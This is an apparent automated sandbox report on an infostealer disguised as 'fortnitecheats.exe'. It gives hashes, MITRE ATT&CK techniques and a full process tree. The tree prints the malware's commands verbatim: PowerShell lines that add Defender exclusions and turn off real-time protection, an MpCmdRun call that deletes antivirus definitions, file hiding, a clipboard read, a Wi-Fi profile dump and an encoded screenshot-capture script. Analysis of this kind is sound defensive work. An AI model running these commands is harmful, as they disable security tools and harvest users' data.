1736edf96be8cb3d83a8199586e9d7798552a33b91bff0d373f51f2abb5b9469

Analysis

max time kernel
5s
max time network
8s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
19-01-2025 18:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fortnitecheats.exe
Size

7.1MB
MD5

835f93b671725726e997586d7693f2ac
SHA1

84c00f7e91ca9bc084fbcca13d1f1493e5d63c73
SHA256

1736edf96be8cb3d83a8199586e9d7798552a33b91bff0d373f51f2abb5b9469
SHA512

997aca778dff0336ed0ca84371a3f4a1f404b07528e0d237bd5138d3a30adfa0b27810421e9551ecfd7e6e91d5a83fbaf6acd3b67d153a6b4bcbf75a89a78481
SSDEEP

98304:m9CIfhvpj8mzMD/x/0feyGgatbQ940BDlgwdnpka9R/k9t+2SzIrzUGt+8tMzl3a:m0OpjoDfyGgqwBdnpkYRMsc8ZzzDLU

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1392	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3972	powershell.exe
4700	powershell.exe
1312	powershell.exe
1088	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4324	cmd.exe
3324	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe
4408	fortnitecheats.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1948	tasklist.exe
4052	tasklist.exe
1912	tasklist.exe
4076	tasklist.exe
796	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1688	cmd.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
716	cmd.exe
1660	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5076	WMIC.exe
2960	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2840	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
3552	WMIC.exe
3552	WMIC.exe
3552	WMIC.exe
3552	WMIC.exe
1088	powershell.exe
3972	powershell.exe
3972	powershell.exe
1088	powershell.exe
5076	WMIC.exe
5076	WMIC.exe
5076	WMIC.exe
5076	WMIC.exe
2960	WMIC.exe
2960	WMIC.exe
2960	WMIC.exe
2960	WMIC.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
3160	WMIC.exe
3160	WMIC.exe
3160	WMIC.exe
3160	WMIC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1948	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3552	WMIC.exe
Token: SeSecurityPrivilege	3552	WMIC.exe
Token: SeTakeOwnershipPrivilege	3552	WMIC.exe
Token: SeLoadDriverPrivilege	3552	WMIC.exe
Token: SeSystemProfilePrivilege	3552	WMIC.exe
Token: SeSystemtimePrivilege	3552	WMIC.exe
Token: SeProfSingleProcessPrivilege	3552	WMIC.exe
Token: SeIncBasePriorityPrivilege	3552	WMIC.exe
Token: SeCreatePagefilePrivilege	3552	WMIC.exe
Token: SeBackupPrivilege	3552	WMIC.exe
Token: SeRestorePrivilege	3552	WMIC.exe
Token: SeShutdownPrivilege	3552	WMIC.exe
Token: SeDebugPrivilege	3552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3552	WMIC.exe
Token: SeRemoteShutdownPrivilege	3552	WMIC.exe
Token: SeUndockPrivilege	3552	WMIC.exe
Token: SeManageVolumePrivilege	3552	WMIC.exe
Token: 33	3552	WMIC.exe
Token: 34	3552	WMIC.exe
Token: 35	3552	WMIC.exe
Token: 36	3552	WMIC.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	WMIC.exe
Token: SeSecurityPrivilege	3552	WMIC.exe
Token: SeTakeOwnershipPrivilege	3552	WMIC.exe
Token: SeLoadDriverPrivilege	3552	WMIC.exe
Token: SeSystemProfilePrivilege	3552	WMIC.exe
Token: SeSystemtimePrivilege	3552	WMIC.exe
Token: SeProfSingleProcessPrivilege	3552	WMIC.exe
Token: SeIncBasePriorityPrivilege	3552	WMIC.exe
Token: SeCreatePagefilePrivilege	3552	WMIC.exe
Token: SeBackupPrivilege	3552	WMIC.exe
Token: SeRestorePrivilege	3552	WMIC.exe
Token: SeShutdownPrivilege	3552	WMIC.exe
Token: SeDebugPrivilege	3552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3552	WMIC.exe
Token: SeRemoteShutdownPrivilege	3552	WMIC.exe
Token: SeUndockPrivilege	3552	WMIC.exe
Token: SeManageVolumePrivilege	3552	WMIC.exe
Token: 33	3552	WMIC.exe
Token: 34	3552	WMIC.exe
Token: 35	3552	WMIC.exe
Token: 36	3552	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3972	powershell.exe
Token: SeSecurityPrivilege	3972	powershell.exe
Token: SeTakeOwnershipPrivilege	3972	powershell.exe
Token: SeLoadDriverPrivilege	3972	powershell.exe
Token: SeSystemProfilePrivilege	3972	powershell.exe
Token: SeSystemtimePrivilege	3972	powershell.exe
Token: SeProfSingleProcessPrivilege	3972	powershell.exe
Token: SeIncBasePriorityPrivilege	3972	powershell.exe
Token: SeCreatePagefilePrivilege	3972	powershell.exe
Token: SeBackupPrivilege	3972	powershell.exe
Token: SeRestorePrivilege	3972	powershell.exe
Token: SeShutdownPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeSystemEnvironmentPrivilege	3972	powershell.exe
Token: SeRemoteShutdownPrivilege	3972	powershell.exe
Token: SeUndockPrivilege	3972	powershell.exe
Token: SeManageVolumePrivilege	3972	powershell.exe
Token: 33	3972	powershell.exe
Token: 34	3972	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4376	mshta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4564 wrote to memory of 4408	4564	fortnitecheats.exe	80
PID 4564 wrote to memory of 4408	4564	fortnitecheats.exe	80
PID 4408 wrote to memory of 1316	4408	fortnitecheats.exe	82
PID 4408 wrote to memory of 1316	4408	fortnitecheats.exe	82
PID 4408 wrote to memory of 5008	4408	fortnitecheats.exe	83
PID 4408 wrote to memory of 5008	4408	fortnitecheats.exe	83
PID 4408 wrote to memory of 3640	4408	fortnitecheats.exe	84
PID 4408 wrote to memory of 3640	4408	fortnitecheats.exe	84
PID 4408 wrote to memory of 4312	4408	fortnitecheats.exe	88
PID 4408 wrote to memory of 4312	4408	fortnitecheats.exe	88
PID 4408 wrote to memory of 4572	4408	fortnitecheats.exe	90
PID 4408 wrote to memory of 4572	4408	fortnitecheats.exe	90
PID 3640 wrote to memory of 4376	3640	cmd.exe	92
PID 3640 wrote to memory of 4376	3640	cmd.exe	92
PID 5008 wrote to memory of 3972	5008	cmd.exe	93
PID 5008 wrote to memory of 3972	5008	cmd.exe	93
PID 4312 wrote to memory of 1948	4312	cmd.exe	94
PID 4312 wrote to memory of 1948	4312	cmd.exe	94
PID 1316 wrote to memory of 1088	1316	cmd.exe	95
PID 1316 wrote to memory of 1088	1316	cmd.exe	95
PID 4572 wrote to memory of 3552	4572	cmd.exe	96
PID 4572 wrote to memory of 3552	4572	cmd.exe	96
PID 4408 wrote to memory of 568	4408	fortnitecheats.exe	99
PID 4408 wrote to memory of 568	4408	fortnitecheats.exe	99
PID 568 wrote to memory of 4164	568	cmd.exe	101
PID 568 wrote to memory of 4164	568	cmd.exe	101
PID 4408 wrote to memory of 3124	4408	fortnitecheats.exe	102
PID 4408 wrote to memory of 3124	4408	fortnitecheats.exe	102
PID 3124 wrote to memory of 3488	3124	cmd.exe	104
PID 3124 wrote to memory of 3488	3124	cmd.exe	104
PID 4408 wrote to memory of 1768	4408	fortnitecheats.exe	105
PID 4408 wrote to memory of 1768	4408	fortnitecheats.exe	105
PID 1768 wrote to memory of 5076	1768	cmd.exe	107
PID 1768 wrote to memory of 5076	1768	cmd.exe	107
PID 4408 wrote to memory of 2404	4408	fortnitecheats.exe	108
PID 4408 wrote to memory of 2404	4408	fortnitecheats.exe	108
PID 2404 wrote to memory of 2960	2404	cmd.exe	110
PID 2404 wrote to memory of 2960	2404	cmd.exe	110
PID 5008 wrote to memory of 1392	5008	cmd.exe	111
PID 5008 wrote to memory of 1392	5008	cmd.exe	111
PID 4408 wrote to memory of 1688	4408	fortnitecheats.exe	112
PID 4408 wrote to memory of 1688	4408	fortnitecheats.exe	112
PID 4408 wrote to memory of 5060	4408	fortnitecheats.exe	114
PID 4408 wrote to memory of 5060	4408	fortnitecheats.exe	114
PID 1688 wrote to memory of 1528	1688	cmd.exe	116
PID 1688 wrote to memory of 1528	1688	cmd.exe	116
PID 5060 wrote to memory of 1312	5060	cmd.exe	117
PID 5060 wrote to memory of 1312	5060	cmd.exe	117
PID 4408 wrote to memory of 3404	4408	fortnitecheats.exe	118
PID 4408 wrote to memory of 3404	4408	fortnitecheats.exe	118
PID 4408 wrote to memory of 1684	4408	fortnitecheats.exe	119
PID 4408 wrote to memory of 1684	4408	fortnitecheats.exe	119
PID 1684 wrote to memory of 1912	1684	cmd.exe	122
PID 1684 wrote to memory of 1912	1684	cmd.exe	122
PID 3404 wrote to memory of 4052	3404	cmd.exe	123
PID 3404 wrote to memory of 4052	3404	cmd.exe	123
PID 4408 wrote to memory of 3408	4408	fortnitecheats.exe	175
PID 4408 wrote to memory of 3408	4408	fortnitecheats.exe	175
PID 4408 wrote to memory of 4324	4408	fortnitecheats.exe	183
PID 4408 wrote to memory of 4324	4408	fortnitecheats.exe	183
PID 4408 wrote to memory of 4812	4408	fortnitecheats.exe	127
PID 4408 wrote to memory of 4812	4408	fortnitecheats.exe	127
PID 4408 wrote to memory of 3828	4408	fortnitecheats.exe	156
PID 4408 wrote to memory of 3828	4408	fortnitecheats.exe	156

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1528	attrib.exe
3356	attrib.exe
3336	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe
"C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4564
- C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe
  "C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3972
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows doesnt match the correct version', 0, '402', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows doesnt match the correct version', 0, '402', 0+16);close()"
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4312
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:568
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\fortnitecheats.exe"
      4⤵
      Views/modifies file attributes
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3404
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3408
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4812
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3828
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:716
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3924
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3940
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG